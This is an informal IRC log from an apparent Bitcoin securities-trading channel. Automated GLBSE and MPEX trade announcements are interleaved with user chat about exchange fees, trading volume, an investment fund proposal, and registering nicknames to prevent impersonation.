then why the fuck is mpex such shit Aug 25 20:43:13 why you think it's called MP Ex ? Aug 25 20:43:22 lol Aug 25 20:43:37 Diablo-D3 you srsly didn't know ?! Aug 25 20:43:47 dude, you just randomly showed up in this channel one day Aug 25 20:43:50 [GLBSE] [BITCOINTORRENTZ] 1 @ 0.666 BTC [+] Aug 25 20:43:52 ahahaha Aug 25 20:43:54 mircea, I'd like to purchase some of evoorhees's satoshi dice shares. Aug 25 20:43:57 [GLBSE] [BITBOND] 4 @ 0.45 = 1.8 BTC [+] Aug 25 20:44:06 bearbones aite, you got a mpex acct/wanna make one or no/no ? Aug 25 20:44:10 mircea_popescu: why the fuck do I have to pay you money to be able to own assets on mpex Aug 25 20:44:14 don't have one Aug 25 20:44:15 [GLBSE] [BITBOND] 4 @ 0.44 = 1.76 BTC [-] Aug 25 20:44:19 [GLBSE] [PAJKA.BOND] 1 @ 0.089 BTC [-] Aug 25 20:44:21 i gather it is a python script, yes? Aug 25 20:44:24 If you want to buy satoshidice Aug 25 20:44:26 Diablo-D3 well... it's a select club. either bring many topless ho's or else money. Aug 25 20:44:29 Make a free GLBSE account and just buy it Aug 25 20:44:34 That pretty much sums it up. Aug 25 20:44:48 bearbones yes, there's a python script to make access easier. i'll also need your gpg public key and 20 btc. Aug 25 20:44:55 [GLBSE] [GREEN] 6 @ 0.749 = 4.494 BTC [-] Aug 25 20:45:10 or use a broker such as smickles Aug 25 20:45:11 The real problem with mpex, mircea, is that it just isn't competitive Aug 25 20:45:16 [MPEX] [S.MPOE] 15153 @ 0.00037524 = 5.686 BTC [+] Aug 25 20:45:17 dude, 20btc to join? :o Aug 25 20:45:18 [MPEX] [S.MPOE] 1321 @ 0.00037897 = 0.5006 BTC [+] Aug 25 20:45:18 [MPEX] [S.MPOE] 37207 @ 0.00037973 = 14.1286 BTC [+] Aug 25 20:45:19 usagi in what terms ? Aug 25 20:45:23 Smickles might be able to save you Aug 25 20:45:38 bearbones yea. if you're not interested tho, as they say, there's brokers or passthrough on glbse. Aug 25 20:45:52 You have a very narrow target market and that market exists to pass thru your securities to GLBSE. Aug 25 20:45:54 You need to think about that Aug 25 20:46:00 MPEX needs a nose job :/ Aug 25 20:46:08 usagi get real. mpex sells more than glbse by a large margin. Aug 25 20:46:18 Oh I saw the numbers Aug 25 20:46:34 well so then ? Aug 25 20:46:34 [GLBSE] [ZETA-MINING] 3 @ 0.1699 = 0.5097 BTC [-] Aug 25 20:47:01 Dunno I just think there's something missing Aug 25 20:47:05 LIke a fine soup that has no pepper Aug 25 20:47:17 this is like the FOSS : bring your own! Aug 25 20:47:47 FOSS? Aug 25 20:48:16 free and open source software. Aug 25 20:48:20 ah Aug 25 20:48:21 then FLOSS Aug 25 20:48:30 Free Libre OSS Aug 25 20:48:32 usagi: Now mpex is a fine soup? Aug 25 20:48:56 im working on BitOTTer for android too, it's coming along, which will help you non-command line dudes to trade MPEx Aug 25 20:49:08 <3 mpex Aug 25 20:50:58 o yea, how's that working ? Aug 25 20:51:23 going ok so far. i don't have much in the way of screen shots quite yet. Aug 25 20:51:25 is it as far as the GLBSE android app? Aug 25 20:51:28 [GLBSE] [BITBOND] 6 @ 0.4451 = 2.6706 BTC [+] Aug 25 20:51:57 floss just sounds gross Aug 25 20:52:05 i've had to change some stuff around a bit to make it easier. and its important for me to make sure this tool will only grab this data from mpex on a periodic basis, etc. Aug 25 20:52:08 or clean Aug 25 20:52:23 hygienic Aug 25 20:52:29 does foss sound any better? Aug 25 20:52:40 hmm... Aug 25 20:52:58 [GLBSE] [BIB.PIRATE] 30 @ 0.4 = 12 BTC [-] Aug 25 20:53:02 We need to FLOSS out Microsoft Aug 25 20:53:04 .4 by now huh Aug 25 20:53:10 anyway, im working on it as often as I can, but my day-job gets in the way a lot. Aug 25 20:53:33 nefario: i have no idea. Aug 25 20:54:05 Ahh yeah thats it Aug 25 20:54:24 MPEX looks like open source and GLBSE looks like commercial software Aug 25 20:55:15 [MPEX] [S.MPOE] 26871 @ 0.00037516 = 10.0809 BTC [-] Aug 25 20:55:17 [MPEX] [S.MPOE] 25129 @ 0.000375 = 9.4234 BTC [-] Aug 25 20:55:53 [GLBSE] [GSDPT] 137 @ 0.0034 = 0.4658 BTC [+] Aug 25 20:57:13 [GLBSE] [ASICMINER] 8 @ 0.0899 = 0.7192 BTC [+] Aug 25 20:57:36 ;;seen diablo-d3 Aug 25 20:57:36 diablo-d3 was last seen in #bitcoin-assets 13 minutes and 25 seconds ago: mircea_popescu: why the fuck do I have to pay you money to be able to own assets on mpex Aug 25 20:57:47 lol the sheer shock of me owning mpex ruined his interwebz. Aug 25 20:58:09 [GLBSE] [BITBOND] 6 @ 0.4079 = 2.4474 BTC [-] Aug 25 20:58:35 I was under the impression that the monthly volume on mpex is 1/3 of that on GLBSE Aug 25 20:59:06 at least it wasn't that good when I last looked at it Aug 25 21:00:09 [MPEX] [O.BTCUSD.P150T] 2 @ 0.53529144 = 1.0706 BTC [+] Aug 25 21:00:50 [MPEX] [F.GIGA.ETF] 1517 @ 0.000999 = 1.5155 BTC [+] Aug 25 21:00:56 GLBSE has done just short of 13K BTC in the last 5 days Aug 25 21:01:00 and this is a slow month Aug 25 21:01:56 mircea_popescu: whats the trade volume on mpex? Aug 25 21:02:14 ~150k this month Aug 25 21:02:50 BTC? Aug 25 21:02:56 [GLBSE] [PUREMINING] 1 @ 0.09979 BTC [-] Aug 25 21:02:56 tbh i don't understand your 5 day scheme. what's wrong with 7 days 30 days ? Aug 25 21:02:58 yes btc. Aug 25 21:03:18 and thats published to the channel here? Aug 25 21:03:28 [GLBSE] [GSDPT] 2600 @ 0.0034 = 8.84 BTC [+] Aug 25 21:04:35 yes ? Aug 25 21:04:39 looky Aug 25 21:04:43 !ticker GIGAMINING Aug 25 21:04:54 !ticker F.GIGA.ETF Aug 25 21:04:58 Mostly option trading :) Aug 25 21:05:00 [GLBSE:GIGAMINING] [Bid: 0.966] [Ask: 0.98449] [Spread: 0.01849] [Last: 0.98449] [24hVol: 88.33579666] [7dAvg: 0.99194366] Aug 25 21:05:01 [MPEX:F.GIGA.ETF] 1day: 0.00097114 / 0.00099582 / 0.00102135 (339144 shares, 337.73 BTC), 30day: 0.00078056 / 0.00100597 / 0.00115139 (6047892 shares, 6,084.05 BTC) Aug 25 21:05:15 that's what, 4x. Aug 25 21:06:29 [GLBSE] [BTCMC] 3 @ 0.5097 = 1.5291 BTC [+] Aug 25 21:06:31 [GLBSE] [BTCMC] 4 @ 0.5098 = 2.0392 BTC [+] Aug 25 21:09:22 [GLBSE] [ASICMINER] 25 @ 0.0899 = 2.2475 BTC [+] Aug 25 21:09:37 [MPEX] [S.MPOE] 43003 @ 0.00037609 = 16.173 BTC [+] Aug 25 21:09:39 [MPEX] [S.MPOE] 17412 @ 0.00037973 = 6.6119 BTC [+] Aug 25 21:09:40 [MPEX] [S.MPOE] 9661 @ 0.00038302 = 3.7004 BTC [+] Aug 25 21:09:41 [MPEX] [S.MPOE] 62600 @ 0.00038319 = 23.9877 BTC [+] Aug 25 21:09:43 [MPEX] [S.MPOE] 1918 @ 0.00038415 = 0.7368 BTC [+] Aug 25 21:09:44 [MPEX] [S.MPOE] 13700 @ 0.00038454 = 5.2682 BTC [+] Aug 25 21:09:45 [MPEX] [S.MPOE] 29479 @ 0.00038831 = 11.447 BTC [+] Aug 25 21:09:46 [MPEX] [S.MPOE] 15400 @ 0.00038836 = 5.9807 BTC [+] Aug 25 21:09:46 [MPEX] [S.MPOE] 25711 @ 0.00038989 = 10.0245 BTC [+] Aug 25 21:09:47 [MPEX] [S.MPOE] 8251 @ 0.00039021 = 3.2196 BTC [+] Aug 25 21:09:48 [MPEX] [S.MPOE] 10365 @ 0.00039114 = 4.0542 BTC [+] Aug 25 21:10:18 [GLBSE] [BITBOND] 6 @ 0.4451 = 2.6706 BTC [+] Aug 25 21:10:32 [MPEX] [S.DICE] 3750 @ 0.0032 = 12 BTC [-] Aug 25 21:11:56 Here's a draft of GBF new infrastructure any thoughts or feedback? Aug 25 21:12:01 note as said only a draft Aug 25 21:13:29 https://docs.google.com/document/d/1kcWMLOT7j7wLutz5mcUCcb69mzP2DQjXk93vUhpatnI/edit?pli=1 Aug 25 21:14:43 you got a non Google docs link? Aug 25 21:14:46 China here Aug 25 21:14:47 ... Aug 25 21:14:48 banned Aug 25 21:14:52 blocked Aug 25 21:14:53 tor? Aug 25 21:14:59 also blocked Aug 25 21:15:36 they can block tor ?! Aug 25 21:15:37 what works Nefario? Aug 25 21:15:40 pastebin? Aug 25 21:15:43 ja Aug 25 21:15:47 mircea_popescu: yes Aug 25 21:15:48 mircea_popescu, you can block exit nodes Aug 25 21:15:56 kakobrekla: no Aug 25 21:16:03 http://pastebin.com/j6iGVM6n Aug 25 21:16:04 well that kinda defeats the entire point of tor neh ? Aug 25 21:16:04 they get a list of all public tor bridges Aug 25 21:16:06 m,ebbe i dun get it Aug 25 21:16:10 and block connections to them Aug 25 21:16:23 aha Aug 25 21:16:29 i thought you were talking about site Aug 25 21:16:30 sry Aug 25 21:17:54 DeaDTerra: how is the interest rate earned to pay investors? Aug 25 21:18:04 [MPEX] [F.GIGA.ETF] 5100 @ 0.00101257 = 5.1641 BTC [+] Aug 25 21:18:24 [GLBSE] [TYGRR.BOND-A] 15 @ 0.1 = 1.5 BTC [+] Aug 25 21:19:09 It's a investment fund Aug 25 21:19:14 100% transparent Aug 25 21:19:16 [MPEX] [F.GIGA.ETF] 2117 @ 0.00102135 = 2.1622 BTC [+] Aug 25 21:19:17 [MPEX] [F.GIGA.ETF] 9083 @ 0.00102242 = 9.2866 BTC [+] Aug 25 21:19:25 the whole of our portfolio can be viewed, it's updated daily :) Aug 25 21:19:34 I have run it off GLBSE since April Aug 25 21:19:43 but I wish to integrate to GLBSE. Aug 25 21:19:52 of Aug 25 21:19:59 this is your investment fund? Aug 25 21:20:03 No guaranteed profits, no guaranteed balanced. Aug 25 21:20:12 Yes this has nothing to do with the thing I talked about before. Aug 25 21:20:17 I have a lot of balls in the air right now Aug 25 21:20:20 ok Aug 25 21:20:38 wy so many balls Aug 25 21:20:58 There's a lot I want to do :) Aug 25 21:21:16 The Pass throughs should be little administration once it's up though. Aug 25 21:21:53 The fund is always a working process, but right now I am going through some upgrading and infrastructure changes. This one needs to be done due to that, we got to many withdraw requests and we can't liquidate fast enough to pay them. Aug 25 21:22:01 Hence the system is kind of flawed Aug 25 21:22:31 [GLBSE] [OBSI.HRPT] 4 @ 0.10699999 = 0.428 BTC [+] Aug 25 21:22:44 [GLBSE] [BITBOND] 2 @ 0.408 = 0.816 BTC [-] Aug 25 21:23:52 liquidity is always a problem Aug 25 21:23:54 anyways, any thoughts? any flaws or concerns you can see? Aug 25 21:23:57 [GLBSE] [BITBOND] 2 @ 0.4499 = 0.8998 BTC [+] Aug 25 21:24:10 It is but I think that this system deals better with the liquidity then the other one. Aug 25 21:24:35 Right now I have been having withdraws queued up for several weeks and due to that I can't take all the investments I want to, the performance have been effected :8 Aug 25 21:24:53 [GLBSE] [BITBOND] 4 @ 0.4499 = 1.7996 BTC [+] Aug 25 21:25:11 I am looking to fix that problem with this once and for all. I am also going to contact some of my bigger investors which have pledged to deposit some BTC one the portfolio is cleaned up (almost there) Aug 25 21:28:08 !pl HYDRO.BONDS 1.73 Aug 25 21:28:08 Requesting data from GLBSE (might take a while). Aug 25 21:28:39 HYDRO.BONDS [1@1.73BTC] paid: 0.34271179 BTC. Last price: 1.64 BTC. Capital gain: -0.09 BTC. Total: 0.25271179 BTC. (14.6%) Aug 25 21:29:04 [GLBSE] [BITBOND] 2 @ 0.4499 = 0.8998 BTC [+] Aug 25 21:30:09 Any feedback? :P Aug 25 21:30:15 I just want to make sure there's no major flaw Aug 25 21:30:47 [GLBSE] [ASICMINER] 3 @ 0.0899 = 0.2697 BTC [+] Aug 25 21:32:47 [GLBSE] [PUREASIC] 4 @ 0.775 = 3.1 BTC [-] Aug 25 21:33:26 seems pretty straightforward. Aug 25 21:36:46 why not do .25% per week admin fee reducton instead of 1 for every 4? maybe with a 4 week minimum. Aug 25 21:37:19 allows a bit more flexibility, while still being long term. Aug 25 21:39:59 yea sure :) Aug 25 21:40:03 didn't think of that :P Aug 25 21:41:14 [MPEX] [S.MPOE] 21500 @ 0.00037951 = 8.1595 BTC [-] Aug 25 21:42:07 is that admin fee calculated to profit or to capital ? Aug 25 21:43:07 to profit Aug 25 21:43:37 [MPEX] [S.DICE] 1000 @ 0.0032 = 3.2 BTC [-] Aug 25 21:43:57 i don't see why it would deter anyone. Aug 25 21:44:05 banks charge fees (much smaller) to capital. Aug 25 21:44:13 for early withdrawals. Aug 25 21:44:42 I don't want to take anything if I am not doing well. Aug 25 21:45:03 It's my responsibility to make sure the fund goes well if it does not then I don't deserve any reward Aug 25 21:45:15 if all i get is 5% extra of the profit i don't care you want me to lock down, i won't. Aug 25 21:45:45 Okay :P Are you saying it's to low of a benefit? Aug 25 21:45:55 yes. present value of money is high in btc Aug 25 21:46:09 the fact i can take it out any time is worth way more than 5% of 1% or w/e a week. Aug 25 21:46:17 Okay what would you suggest? Aug 25 21:46:37 i dunno, i'm better at pointing out flaws than at fixing things. Aug 25 21:46:49 hahah okay :P Aug 25 21:46:49 [GLBSE] [GSDPT] 100 @ 0.0034 = 0.34 BTC [+] Aug 25 21:47:21 !ticker s.dice Aug 25 21:47:23 [MPEX:S.DICE] 1day: 0.0032 / 0.00320176 / 0.003232 (1869240 shares, 5,984.87 BTC), 30day: 0.0032 / 0.00320176 / 0.003232 (1869240 shares, 5,984.87 BTC) Aug 25 21:47:29 ahh, almost sold out then Aug 25 21:47:34 [GLBSE] [BTC-MINING] 4 @ 0.98999 = 3.96 BTC [-] Aug 25 21:47:46 Though if you take the short investor path you get paid 80% of the profit generated while if you take the long term you can get up to 96.5% Aug 25 21:48:07 ya so i deposit 1k btc. Aug 25 21:48:13 10% admin fee + 10% insurance for the NAV Aug 25 21:48:19 in one week i could make say 16 or 19 ? Aug 25 21:48:26 for 3 btc im not locking down the 1k Aug 25 21:48:49 hm I guess. Aug 25 21:53:02 Does anyone know who pirate is? Aug 25 21:53:43 [GLBSE] [TYGRR.BOND-P] 1 @ 0.52 BTC [-] Aug 25 21:53:51 ugh Aug 25 21:53:54 Does anyone know what that funny address was about http://1dkybekt5s2gdtv7aqw6rqepavnsryhoym.com/ Aug 25 21:54:22 as in "real" identity? Aug 25 21:57:17 [GLBSE] [BITBOND] 2 @ 0.45 = 0.9 BTC [+] Aug 25 21:59:12 [GLBSE] [PUREMINING] 78 @ 0.063 = 4.914 BTC [-] Aug 25 22:01:07 wow Aug 25 22:01:17 the censorship in BTCST is fucking redicilous Aug 25 22:01:27 I was going to check when Pirate was last seen i got auto silenced... Aug 25 22:01:59 ;;seen #btcst pirateat40 Aug 25 22:02:00 pirateat40 was last seen in #btcst 20 hours, 55 minutes, and 32 seconds ago: johnthedong2, a few hours. Aug 25 22:02:00 fucking censorship, they are suppressing the citizens of the IRC channel. They are centralized :( They are going against the basics of Bitcoins Aug 25 22:02:07 there you go bud Aug 25 22:02:11 thanks :) Aug 25 22:02:12 [GLBSE] [ASICMINER] 110 @ 0.0898 = 9.878 BTC [-] Aug 25 22:02:19 Still pissed about it though Aug 25 22:02:38 there was spamming there thats why Aug 25 22:02:44 I've had two strange trades Aug 25 22:02:55 I don't care you don't auto silence people... Aug 25 22:03:04 imsaguy does Aug 25 22:04:07 He can go throw himself into a wall Aug 25 22:04:48 -!- mode/#btcst [+q *!~gribble@unaffiliated/nanotube/bot/gribble] by imsaguy2 Aug 25 22:04:51 15:04:05 <@imsaguy2> gribble : You may talk again when you learn to behave. Aug 25 22:05:25 DeaDTerra: even gribble gets autobanned there Aug 25 22:05:29 srsly, if i cared i'd join. Aug 25 22:05:48 mircea_popescu: sorry Aug 25 22:06:05 no big deal, jus' sayin'. Aug 25 22:06:44 [MPEX] [F.GIGA.ETF] 9817 @ 0.00102242 = 10.0371 BTC [+] Aug 25 22:06:46 [MPEX] [F.GIGA.ETF] 1283 @ 0.00102409 = 1.3139 BTC [+] Aug 25 22:06:47 [GLBSE] [BITCOINTORRENTZ] 5 @ 0.666 = 3.33 BTC [+] Aug 25 22:11:17 hey help me out Aug 25 22:11:37 let's chat Aug 25 22:12:02 I need to figure something out. Aug 25 22:13:03 sup Rothgar ? Aug 25 22:14:06 great Aug 25 22:14:29 mircea_popescu, I did some sucessful trades with someone who claims to be a neeb Aug 25 22:14:34 noob Aug 25 22:14:42 But they're not Aug 25 22:14:46 aha ? Aug 25 22:14:55 Could we go private Aug 25 22:15:06 o which reminds me : DeaDTerra register your name with nickserv! you jhad an impostor earlier tryingto defraud people Aug 25 22:15:07 safra sgnb sgornick Shalom_ smickles SomeoneWeird SuprTiggr Sysrq3 Aug 25 22:15:10 Rothgar sure Aug 25 22:15:20 great Aug 25 22:16:01 [GLBSE] [NASTY] 1 @ 0.56 BTC [-] Aug 25 22:16:10 [GLBSE] [ASICMINER] 1 @ 0.0898 BTC [-] Aug 25 22:18:49 [GLBSE] [OBSI.HRPT] 40 @ 0.10699999 = 4.28 BTC [+] Aug 25 22:23:53 [MPEX] [S.MPOE] 40000 @ 0.00037607 = 15.0428 BTC [-] Aug 25 22:23:55 [MPEX] [S.MPOE] 13837 @ 0.000375 = 5.1889 BTC [-] Aug 25 22:24:42 [MPEX] [B.MPCD.A] 1000 @ 0.0010078 = 1.0078 BTC [+] Aug 25 22:27:04 okay how do I register? Aug 25 22:28:00 [MPEX] [S.MPOE] 10000 @ 0.00037712 = 3.7712 BTC [+] Aug 25 22:28:30 [GLBSE] [GMVT-BOT] 10 @ 0.148 = 1.48 BTC [+] Aug 25 22:29:14 /msg nickserv help register Aug 25 22:29:41 [GLBSE] [GMVT-BOT] 22 @ 0.148 = 3.256 BTC [+] Aug 25 22:30:46 [GLBSE] [GMVT-BOT] 20 @ 0.149 = 2.98 BTC [+] Aug 25 22:31:40 done Aug 25 22:32:07 [GLBSE] [GSDPT] 425 @ 0.0034 = 1.445 BTC [+] Aug 25 22:33:30 also, "/msg nickserv set enforce on" is useful Aug 25 22:33:54 that way, if someone tries to impersonate you, they'll be kicked out if they don't authenticate Aug 25 22:34:41 [GLBSE] [PUREMINING] 3 @ 0.09978999 = 0.2994 BTC [+] Aug 25 22:36:22 thanks :) Aug 25 22:36:32 np :) Aug 25 22:37:05 DeaDTerra, thanks for preventing scams Aug 25 22:39:16 [GLBSE] [PUREMINING] 7 @ 0.09978999 = 0.6985 BTC [+] Aug 25 22:39:34 No problems, I want to avoid scams as much as anyone else Aug 25 22:39:45 [GLBSE] [YABMC] 2 @ 0.12818 = 0.2564 BTC [+] Aug 25 22:39:47 [GLBSE] [MERGEDMINING] 3 @ 0.08200001 = 0.246 BTC [-] Aug 25 22:40:28 [GLBSE] [MERGEDMINING] 34 @ 0.082 = 2.788 BTC [-] Aug 25 22:40:55 when I started with this OTC someone would use my nick Aug 25 22:41:04 [GLBSE] [TYGRR.BOND-A] 3 @ 0.1 = 0.3 BTC [+] Aug 25 22:41:08 [MPEX] [S.DICE] 19455 @ 0.0032 = 62.256 BTC [-] Aug 25 22:41:27 I had to register too, and I wasn't as prominent Aug 25 22:42:50 [MPEX] [S.DICE] 742 @ 0.0032 = 2.3744 BTC [-] Aug 25 22:42:53 [GLBSE] [PUREMINING] 1 @ 0.09978999 BTC [+] Aug 25 22:47:15 [GLBSE] [GIGAMINING] 4 @ 0.9701 = 3.8804 BTC [-] Aug 25 22:47:17 [GLBSE] [GIGAMINING] 15 @ 0.97 = 14.55 BTC [-] Aug 25 22:47:18 [GLBSE] [GIGAMINING] 1 @ 0.966 BTC [-] Aug 25 22:47:19 [GLBSE] [GIGAMINING] 6 @ 0.965 = 5.79 BTC [-] Aug 25 22:47:21 [GLBSE] [GIGAMINING] 10 @ 0.96 = 9.6 BTC [-] Aug 25 22:47:21 [GLBSE] [GIGAMINING] 1 @ 0.95 BTC [-] Aug 25 22:47:22 [GLBSE] [GIGAMINING] 1 @ 0.9402 BTC [-] Aug 25 22:47:23 [GLBSE] [GIGAMINING] 2 @ 0.94011 = 1.8802 BTC [-] Aug 25 22:47:24 [GLBSE] [GIGAMINING] 8 @ 0.94 = 7.52 BTC [-] Aug 25 22:47:25 [GLBSE] [GIGAMINING] 4 @ 0.94 = 3.76 BTC [-] Aug 25 22:47:27 [GLBSE] [GIGAMINING] 5 @ 0.921 = 4.605 BTC [-] Aug 25 22:47:28 [GLBSE] [GIGAMINING] 1 @ 0.92 BTC [-] Aug 25 22:47:29 [GLBSE] [GIGAMINING] 1 @ 0.901 BTC [-] Aug 25 22:47:30 [GLBSE] [GIGAMINING] 100 @ 0.9001 = 90.01 BTC [-] Aug 25 22:47:30 [GLBSE] [GIGAMINING] 86 @ 0.9 = 77.4 BTC [-] Aug 25 22:48:32 [GLBSE] [GIGAMINING] 14 @ 0.9 = 12.6 BTC [-] Aug 25 22:48:34 [GLBSE] [GIGAMINING] 1 @ 0.895 BTC [-] Aug 25 22:49:58 !pl GIGAMINING 1.25 Aug 25 22:49:59 Requesting data from GLBSE (might take a while). Aug 25 22:50:01 GIGAMINING [1@1.25BTC] paid: 0.39930096 BTC. Last price: 0.895 BTC. Capital gain: -0.355 BTC. Total: 0.04430096 BTC. (3.5%) Aug 25 22:51:03 [GLBSE] [DMC] 1 @ 0.0769 BTC [-] Aug 25 22:51:25 only 2 trades at that price so it's more like 1.55+ Aug 25 22:51:28 !pl GIGAMINING 1.55 Aug 25 22:51:28 Requesting data from GLBSE (might take a while). Aug 25 22:51:34 GIGAMINING [1@1.55BTC] paid: 0.39930096 BTC. Last price: 0.895 BTC. Capital gain: -0.655 BTC. Total: -0.25569904 BTC. (-16.5%) Aug 25 22:54:25 [GLBSE] [FOO.PPPPT] 1 @ 0.35001337 BTC [-] Aug 25 22:55:14 [MPEX] [S.MPOE] 60500 @ 0.000375 = 22.6875 BTC [-] Aug 25 22:57:08 [GLBSE] [OBSI.HRPT] 4 @ 0.10699999 = 0.428 BTC [+] Aug 25 22:57:48 [GLBSE] [FOO.PPPPT] 9 @ 0.35001337 = 3.1501 BTC [-] Aug 25 22:57:50 [GLBSE] [FOO.PPPPT] 20 @ 0.35 = 7 BTC [-] Aug 25 22:59:36 [GLBSE] [BIB.PIRATE] 20 @ 0.3402 = 6.804 BTC [-] Aug 25 23:03:18 [GLBSE] [BDT] 1 @ 1.095 BTC [+] Aug 25 23:03:19 [GLBSE] [BDT] 9 @ 1.098 = 9.882 BTC [+] Aug 25 23:03:21 [GLBSE] [BDT] 8 @ 1.1 = 8.8 BTC [+] Aug 25 23:03:22 [GLBSE] [BDT] 9 @ 1.17 = 10.53 BTC [+] Aug 25 23:03:22 [GLBSE] [BDT] 19 @ 1.17899999 = 22.401 BTC [+] Aug 25 23:03:51 [GLBSE] [BDT] 2 @ 1.17899999 = 2.358 BTC [+] Aug 25 23:05:45 [GLBSE] [TYGRR.BOND-P] 2 @ 0.3302337 = 0.6605 BTC [-] Aug 25 23:05:47 [GLBSE] [TYGRR.BOND-P] 9 @ 0.3301337 = 2.9712 BTC [-] Aug 25 23:13:06 [GLBSE] [FOO.PPPPT] 24 @ 0.34 = 8.16 BTC [-] Aug 25 23:14:52 [GLBSE] [BIB.PIRATE] 17 @ 0.33500001 = 5.695 BTC [-] Aug 25 23:15:24 [GLBSE] [BIF.5-10.MININGBOND] 18 @ 0.5 = 9 BTC [+] Aug 25 23:15:35 [GLBSE] [BIF.5-10.MININGBOND] 20 @ 0.55 = 11 BTC [+] Aug 25 23:15:37 [GLBSE] [BIF.5-10.MININGBOND] 30 @ 0.55 = 16.5 BTC [+] Aug 25 23:16:04 [GLBSE] [BIF.5-10.MININGBOND] 20 @ 0.55 = 11 BTC [+] Aug 25 23:17:50 [GLBSE] [NYAN] 51 @ 1 = 51 BTC [+] Aug 25 23:22:40 [GLBSE] [NYAN.B] 7 @ 0.75 = 5.25 BTC [-] Aug 25 23:22:59 [GLBSE] [FPGAMINING] 15 @ 0.935 = 14.025 BTC [+] Aug 25 23:23:01 [GLBSE] [FPGAMINING] 14 @ 0.941 = 13.174 BTC [+] Aug 25 23:27:09 [MPEX] [S.MPOE] 4834 @ 0.000375 = 1.8128 BTC [-] Aug 25 23:27:10 [MPEX] [S.MPOE] 17058 @ 0.00037475 = 6.3925 BTC [-] Aug 25 23:27:11 [MPEX] [S.MPOE] 29708 @ 0.00037401 = 11.1111 BTC [-] Aug 25 23:27:41 [GLBSE] [BITBOND] 6 @ 0.4451 = 2.6706 BTC [-] Aug 25 23:28:36 [GLBSE] [NYAN.C] 6 @ 0.7 = 4.2 BTC [-] Aug 25 23:32:47 [GLBSE] [TYGRR.BOND-P] 4 @ 0.34 = 1.36 BTC [+] Aug 25 23:37:47 [GLBSE] [TYGRR.BOND-P] 2 @ 0.4999 = 0.9998 BTC [+] Aug 25 23:37:48 anyone able to float me a couple hundred mpexbtc until mircea can confirm a deposit? Aug 25 23:39:33 [GLBSE] [ASICMINER] 4 @ 0.0898 = 0.3592 BTC [-] Aug 25 23:40:47 [GLBSE] [YABMC] 4 @ 0.12818 = 0.5127 BTC [+] Aug 25 23:40:53 [GLBSE] [PUREMINING] 1 @ 0.09978999 BTC [+] Aug 25 23:42:51 sorry, used it all up today Aug 25 23:43:21 thanks for you consideration tho :) Aug 25 23:44:23 I can send you 10... Aug 25 23:44:39 Would it be worth the hassle? Aug 25 23:45:43 yeah, I have 4, but I assume that's pointless when you're looking for a couple hundred :) Aug 25 23:46:12 heh, yeah ;) Aug 25 23:46:16 Yea, I assume so, but we can ask... :) Aug 25 23:47:06 yeah, no harm in asking Aug 25 23:47:20 [MPEX] [S.MPOE] 2003 @ 0.0003749 = 0.7509 BTC [+] Aug 25 23:47:28 but for 'the hassle' i can probably just wait for the deposit to go thru Aug 25 23:47:30 [MPEX] [S.MPOE] 12200 @ 0.00037712 = 4.6009 BTC [+] Aug 25 23:47:32 [MPEX] [S.MPOE] 30400 @ 0.00037736 = 11.4717 BTC [+] Aug 25 23:47:42 deposits should really be automated... Aug 25 23:48:01 [MPEX] [S.MPOE] 16000 @ 0.00037863 = 6.0581 BTC [+] Aug 25 23:48:25 Yea, I'm fine with withdrawals being reviewed Aug 25 23:48:38 For security, but deposits? Aug 25 23:48:49 my thoughts exactly Aug 25 23:49:03 [GLBSE] [GSDPT] 1000 @ 0.0034 = 3.4 BTC [+] Aug 25 23:49:16 [GLBSE] [BFLS.RIG] 4 @ 0.94949 = 3.798 BTC [-] Aug 25 23:51:14 deposits may be this way because the wallet is offline Aug 25 23:51:36 [GLBSE] [BTCWEB] 10 @ 0.1096 = 1.096 BTC [-] Aug 25 23:51:38 [GLBSE] [BTCWEB] 40 @ 0.1098 = 4.392 BTC [+] Aug 25 23:51:53 that doesn't matter right, deposits can easily be watched without the private key Aug 25 23:52:32 http://blockchain.info/address/1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx Aug 25 23:58:38 hehe, no worries, happens to the best of us Aug 25 23:58:57 [GLBSE] [BIB.BVPS] 8 @ 0.0039 = 0.0312 BTC [-] Aug 25 23:58:59 what's interesting though, is that the address has only ever received 9494 BTC Aug 25 23:59:30 and as far as I know there is only a single deposit address for the exchange Aug 25 23:59:56 there are other ways to get funds in Aug 26 00:00:05 margin being one of them Aug 26 00:00:12 oh ok Aug 26 00:00:44 because the claimed daily average is ~ 5K BTC Aug 26 00:01:07 So, most of the volume is on margin? Aug 26 00:01:23 What leverage are they allowing? Aug 26 00:01:32 if that addy is the only way to deposit, then yeah, seems most is leveraged Aug 26 00:01:53 rdponticelli: each person gets custom tailored margin Aug 26 00:01:57 if requested Aug 26 00:02:09 Yea, I tough so Aug 26 00:02:32 i haven't asked for it, so i can't give an example Aug 26 00:02:55 It seems that some must have some "generous" leverage Aug 26 00:02:59 [GLBSE] [FPGAMINING] 4 @ 0.9001 = 3.6004 BTC [-] Aug 26 00:03:01 [GLBSE] [FPGAMINING] 10 @ 0.9 = 9 BTC [-] Aug 26 00:03:02 [GLBSE] [FPGAMINING] 2 @ 0.89 = 1.78 BTC [-] Aug 26 00:03:02 [GLBSE] [FPGAMINING] 1 @ 0.88 BTC [-] Aug 26 00:03:04 [GLBSE] [FPGAMINING] 2 @ 0.88 = 1.76 BTC [-] Aug 26 00:03:05 [GLBSE] [FPGAMINING] 7 @ 0.87521 = 6.1265 BTC [-] Aug 26 00:03:06 [GLBSE] [FPGAMINING] 10 @ 0.8752 = 8.752 BTC [-] Aug 26 00:03:07 [GLBSE] [FPGAMINING] 5 @ 0.875 = 4.375 BTC [-] Aug 26 00:03:08 [GLBSE] [FPGAMINING] 1 @ 0.8702 BTC [-] Aug 26 00:03:10 [GLBSE] [FPGAMINING] 28 @ 0.861 = 24.108 BTC [-] Aug 26 00:03:38 rdponticelli: it'd be a good question to put to mircea_popescu, how come only 9k has been sent to the deposti addy Aug 26 00:03:51 Yeap Aug 26 00:04:29 if the forum FUDders hear about this there will be a riot :P Aug 26 00:04:53 ;;later tell mircea_popescu rdponticelli: it'd be a good question to put to mircea_popescu, how come only 9k has been sent to the deposti addy Aug 26 00:04:53 The operation succeeded. Aug 26 00:05:02 Done ;D Aug 26 00:05:17 i'd bet, that if you were going to deposite a large amount, and didn't want it public knowledge Aug 26 00:05:20 [GLBSE] [GSDPT] 3 @ 0.0034 = 0.0102 BTC [+] Aug 26 00:05:29 mircea_popescu would generate you an addy Aug 26 00:05:30 ^ yeah, that's the most likely explanation Aug 26 00:05:35 Yes, it's possible Aug 26 00:07:04 I'd rather he used individual addresses anyway. It's cheap enough to generate them. Aug 26 00:08:08 Certainly Aug 26 00:08:24 [GLBSE] [BITBOND] 6 @ 